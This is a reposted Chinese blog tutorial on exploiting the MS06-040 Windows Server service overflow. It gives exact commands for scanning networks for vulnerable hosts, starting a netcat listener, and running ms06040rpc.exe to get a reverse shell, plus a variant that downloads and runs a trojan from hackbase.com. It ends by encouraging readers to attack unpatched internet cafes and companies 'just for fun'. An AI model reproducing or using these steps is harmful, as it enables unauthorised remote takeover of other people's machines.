天天看點

【轉】基于溢出的入侵

背景                                                                                                                                                                

  Ms06040(Server服務中的緩沖區溢出漏洞)是繼ms06035以後的又一個重大漏洞,利用此漏洞的魔波蠕蟲已經開始蔓延,相信互連網又會是以掀起血雨腥風。

  此漏洞的影響範圍有多大?

    這是一個遠端執行代碼漏洞。 成功利用此漏洞的攻擊者可以遠端完全控制受影響的系統。 攻擊者可随後安裝程式;檢視、更改或删除資料;或者建立擁有完全使用者權限的新帳戶。

  造成漏洞的原因是什麼?

    Server 服務中未經檢查的緩沖區。

  什麼是 Server 服務?

    Server 服務通過網絡提供 RPC 支援和檔案列印支援以及命名管道共享。 Server 服務允許共享您的本地資源(例如磁盤和列印機),以便網絡上的其他使用者可以通路。 它還允許在其他計算機和您的計算機上運作的應用程式之間進行命名管道通信(用于 RPC)。

  攻擊者可能利用此漏洞執行什麼操作?

    成功利用此漏洞的攻擊者可以完全控制受影響的系統。

  哪些人可能會利用此漏洞?

    任何可向受影響的系統傳送特制消息的匿名使用者都可以嘗試利用此漏洞。

  攻擊者能夠如何利用此漏洞?

    攻擊者可能試圖通過建立特制的消息并将其發送到受影響的系統來利用此漏洞。 這樣,這些消息可能導緻受影響的系統執行代碼。

  受此漏洞威脅最大的系統有哪些?

    所有工作站和伺服器均受此問題的威脅,其中由于該漏洞的獨特特征以及受影響的代碼路徑,Windows 2000 系統受到的威脅最大。

實戰                                                                                                                                                                 

  首先我們弄了個掃描工具:rpc-server Scanner IP位址填入你想掃描的網段,點“掃描全部”。

  現在它已經開始工作了,去喝口水回來,已經全部掃描完畢

    

【轉】基于溢出的入侵

  看到沒,顯示Vulnerable的就說明存在漏洞我們來利用,首先在開始運作裡打開CMD用nc監聽一個端口。

【轉】基于溢出的入侵

  我這輸入“Nc –l –vv –p 8888”, 監聽8888端口。

  現在我們開始溢出這是它的說明:

【轉】基于溢出的入侵

  

【轉】基于溢出的入侵
【轉】基于溢出的入侵

  方法一:指令:ms06040rpc.exe  攻擊的IP   你的IP   反彈端口 系統類型系統類型:“1”就是win 2000sp4“2”就是winxpsp1

      舉例:ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1

方法二:指令:ms06040rpc.exe 你的木馬位址系統類型

      舉例:ms06040rpc.exe  192.168.209.128 http://www.hackbase.com/muma.exe 1溢出成功後就自動下載下傳http://www.hackbase.com/muma.exe 并且執行

  我們這輸入ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1 192.168.209.128就是我要攻擊的IP,192.168.137.1就是我的IP,8888就是我剛才用Nc監聽的8888端口

【轉】基于溢出的入侵

  提示發送成功

【轉】基于溢出的入侵

  OK,我們的得到了一個SHELL,可以随心的控制他了

最後                                                                                                                                                               

  很多人,包括一些大蝦們都弄不懂為什麼明明XPSP2和2003系統明明說了有漏洞可是不能利用呵呵,告訴大家,其實XPSP2用了DEP技術

  因為DEP能夠對各種程式進行監視,阻止病毒在受保護的記憶體位置運作有害代碼。DEP通過處理器的NX(No eXecute)功能,查找記憶體中沒有明确包含可執行代碼的資料(這些資料有時會是病毒的源代碼),找到這些資料後,NX将它們都标記為“不可執行”。以後如果某程式在記憶體中,試圖執行這些帶“不可執行”标記的代碼,SP2将會自動關閉該程式。是以,假如你運作了一個已經染毒的軟體,DEP就會把病毒代碼标記為“不可執行”,這樣就能阻止病毒在記憶體中運作,保護電腦中的檔案免受蠕蟲、病毒的傳染破壞。

  很多朋友犯迷糊了打個比方就是系統給每個合法的應用程式發一張名片,但是溢出程式的原理沒有名片,就不能執行明白了吧,哈哈

  很多網吧,很多大公司都有沒打更新檔請大家小心利用。JUST FOR FUN!

本文轉自我愛物聯網部落格園部落格,原文連結:http://www.cnblogs.com/yydcdut/p/3515187.html,如需轉載請自行聯系原作者

繼續閱讀